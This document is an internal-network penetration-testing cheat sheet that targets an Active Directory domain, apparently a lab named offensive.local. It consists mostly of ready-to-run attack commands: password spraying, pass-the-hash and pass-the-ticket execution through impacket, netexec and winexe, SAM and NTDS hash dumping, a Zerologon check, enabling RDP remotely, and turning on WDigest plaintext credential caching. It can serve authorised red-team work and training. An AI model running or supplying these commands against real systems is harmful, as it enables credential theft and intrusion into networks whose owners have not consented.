3. Internal network penetration testing
3.1 Information gathering
Run on the domain controller: list machine name, OS version and IP address
get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address

The same command, exporting the result to a CSV file
get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address | Export-Csv c:\temp\AD.csv -encoding utf8
On the DC: user name, SID, group (the query below selects Name, Sid and DistinguishedName)
get-ADUser -filter * -properties * | select Name,Sid,DistinguishedName

RustHound (BloodHound collector): export domain information
./rusthound -d offensive.local -f DC.offensive.local -u dbadmin -p Admin12345 -z
Domain user enumeration and password spraying
Check which users exist
kerbrute_windows_amd64.exe userenum --dc 192.168.1.1 -d offensive.local user.txt
Spray one password across the user list
kerbrute_windows_amd64.exe passwordspray --dc 192.168.1.1 -d offensive.local user.txt Admin12345
3.2 Linux lateral movement
1. Winexe
-U sets the username and password
Administrator%P@ssw0rd is the host's username and password, separated by %
--uninstall removes the winexe service automatically when leaving the controlled host, to reduce the chance of detection
//127.0.0.1 is the format for the IP address
cmd.exe (the final argument) is the program to run
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 cmd.exe    # returns an interactive console
winexe -U offensive/Administrator%Password@ --uninstall //192.168.3.200 "whoami /user"

2. netexec
smb command (with output codec)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk

smb command (with output codec), CrackMapExec syntax
cme smb 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec=gbk

smb Command PTH
netexec smb 192.168.3.110 -u Administrator -H 'ccef208c6485269c20db2cad21734fe7' -x "whoami /user" --codec gbk

smb PowerShell Command
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk -X '$PSVersionTable'

smb exec-method: smbexec, wmiexec, mmcexec, atexec
--exec-method {smbexec,wmiexec,mmcexec,atexec}
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method smbexec -x "whoami"

netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method mmcexec -x "whoami"
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --exec-method atexec -x "whoami"
winrm Command
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 -x 'whoami /user' --codec gbk

sam dump
netexec winrm 192.168.3.110 -u Administrator -p Admin12345 --sam --codec gbk

smb dump ntds hash
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --codec gbk

smb dump ntds hash log
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --ntds --log offensive.log --codec gbk

smb dump ntds hash via the ntdsutil module (lower success rate)
netexec smb 192.168.3.110 -u Administrator -p Admin12345 -M ntdsutil --codec gbk
pass-pol
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --pass-pol

enumerate disks
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --disks

loggedon-users
netexec smb 192.168.3.110 -u Administrator -p Admin12345 --codec gbk --loggedon-users

ldap query
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" ""

ldap query1
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 --query "(samAccountName=dbadmin)" "sAMAccountName pwdLastSet"

netexec smb -L

└─$ netexec smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] dfscoerce Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
netexec smb zerologon
netexec smb 192.168.3.110 -u dbadmin -p Admin12345 -M zerologon

netexec ldap -L

└─$ netexec ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
netexec ldap maq
netexec ldap 192.168.3.110 -u Administrator -p Admin12345 -M maq

netexec ldap whoami

netexec ldap get-network
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M get-network

netexec ldap adcs
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M adcs

netexec ldap trusts
netexec ldap 192.168.3.110 -u dbadmin -p Admin12345 -M enum_trusts

3. evil-winrm
evil-winrm -i 192.168.3.110 -u Administrator -p Admin12345

3.3 impacket
Workgroup account format: ./Administrator
Domain account format: offensive/Administrator
impacket-secretsdump
On the DC: export hashes by saving the registry hives and parsing them locally
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
secretsdump.exe -sam sam.hiv -security security.hiv -system system.hiv LOCAL
On the DC: export all domain user hashes (SYSTEM hive plus ntds.dit)
reg save HKLM\SYSTEM system.hiv
secretsdump.exe -system system.hiv -ntds ntds.dit LOCAL
secretsdump: dump all domain user hashes (remote, with password)
impacket-secretsdump offensive/Administrator:Admin12345@offensive.local -dc-ip 192.168.3.110

secretsdump: dump all domain user hashes (remote, pass-the-hash)
impacket-secretsdump -hashes :ccef208c6485269c20db2cad21734fe7 offensive/Administrator@offensive.local -dc-ip 192.168.3.110

secretsdump: view the Administrator user's hash

impacket-psexec with pass-the-ticket
impacket-getTGT -hashes :ccef208c6485269c20db2cad21734fe7 offensive.local/administrator

export KRB5CCNAME=administrator.ccache
impacket-psexec offensive.local/Administrator@DC.offensive.local -k -no-pass -codec gbk

impacket-psexec command execution
impacket-psexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-psexec command execution with pass-the-hash
impacket-psexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-wmiexec command execution
impacket-wmiexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-wmiexec command execution with pass-the-hash
impacket-wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-atexec command execution
impacket-atexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-smbexec command execution
impacket-smbexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk

impacket-smbexec command execution with pass-the-hash
impacket-smbexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-dcomexec command execution (password, then pass-the-hash)
impacket-dcomexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk
impacket-dcomexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk
impacket-lookupsid: look up user SIDs
impacket-lookupsid -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110

impacket-GetADUsers: list all users
impacket-GetADUsers -all offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110

impacket-GetADComputers: list all computers
impacket-GetADComputers offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110

impacket-reg: query registry information
- Check the RDP (3389) port number
impacket-reg offensive/administrator:Admin12345@192.168.3.173 query -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -v "PortNumber"

- Enable RDP (3389)
impacket-reg offensive/administrator:Admin12345@192.168.3.173 add -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections -vt REG_DWORD -vd 0

- Enable WDigest plaintext credential caching
impacket-reg ./Administrator@192.168.3.173 -hashes ':ccef208c6485269c20db2cad21734fe7' add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -v 'UseLogonCredential' -vt 'REG_DWORD' -vd '1'

impacket error (LDAP bind failure, invalid credentials)
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839
